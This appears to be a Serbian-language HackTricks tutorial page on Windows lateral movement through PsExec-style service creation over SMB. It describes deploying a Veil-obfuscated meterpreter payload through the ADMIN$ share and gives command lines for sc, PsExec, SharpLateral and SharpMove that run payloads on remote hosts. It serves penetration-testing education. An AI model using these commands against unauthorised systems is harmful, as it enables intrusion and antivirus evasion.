PsExec/Winexec/ScExec/SMBExec

Reading time: 3 minutes

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Kako funkcionišu

Proces je opisan u koracima ispod, ilustrujući kako se binarni fajlovi servisa manipulišu da bi se postigla daljinska izvršenja na ciljnim mašinama putem SMB:

  1. Kopiranje binarnog fajla servisa na ADMIN$ share preko SMB se vrši.
  2. Kreiranje servisa na udaljenoj mašini se vrši upućivanjem na binarni fajl.
  3. Servis se pokreće daljinski.
  4. Po izlasku, servis se zaustavlja, a binarni fajl se briše.

Proces ručnog izvršavanja PsExec

Pretpostavljajući da postoji izvršni payload (napravljen sa msfvenom i obfuskiran koristeći Veil da bi izbegao detekciju antivirusnog softvera), nazvan 'met8888.exe', koji predstavlja meterpreter reverse_http payload, sledeći koraci se preduzimaju:

  • Kopiranje binarnog fajla: Izvršni fajl se kopira na ADMIN$ share iz komandne linije, iako može biti postavljen bilo gde na fajl sistemu da bi ostao skriven.
  • Umesto kopiranja binarnog fajla, takođe je moguće koristiti LOLBAS binarni fajl kao što je powershell.exe ili cmd.exe da se izvrše komande direktno iz argumenata. Npr. sc create [ServiceName] binPath= "cmd.exe /c [PayloadCommand]"
  • Kreiranje servisa: Korišćenjem Windows sc komande, koja omogućava upit, kreiranje i brisanje Windows servisa daljinski, kreira se servis nazvan "meterpreter" koji upućuje na otpremljeni binarni fajl.
  • Pokretanje servisa: Poslednji korak uključuje pokretanje servisa, što će verovatno rezultirati "time-out" greškom zbog toga što binarni fajl nije pravi binarni fajl servisa i ne uspeva da vrati očekivani kod odgovora. Ova greška je beznačajna jer je primarni cilj izvršenje binarnog fajla.

Posmatranje Metasploit slušatelja će otkriti da je sesija uspešno započeta.

Saznajte više o sc komandi.

Pronađite detaljnije korake u: https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/

  • Takođe možete koristiti Windows Sysinternals binarni fajl PsExec.exe:

Ili mu pristupiti putem webddav:

bash
\\live.sysinternals.com\tools\PsExec64.exe -accepteula
bash
SharpLateral.exe redexec HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe.exe malware.exe ServiceName
bash
SharpMove.exe action=modsvc computername=remote.host.local command="C:\windows\temp\payload.exe" amsi=true servicename=TestService
SharpMove.exe action=startservice computername=remote.host.local servicename=TestService
  • Takođe možete koristiti Impacketov psexec i smbexec.py.

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks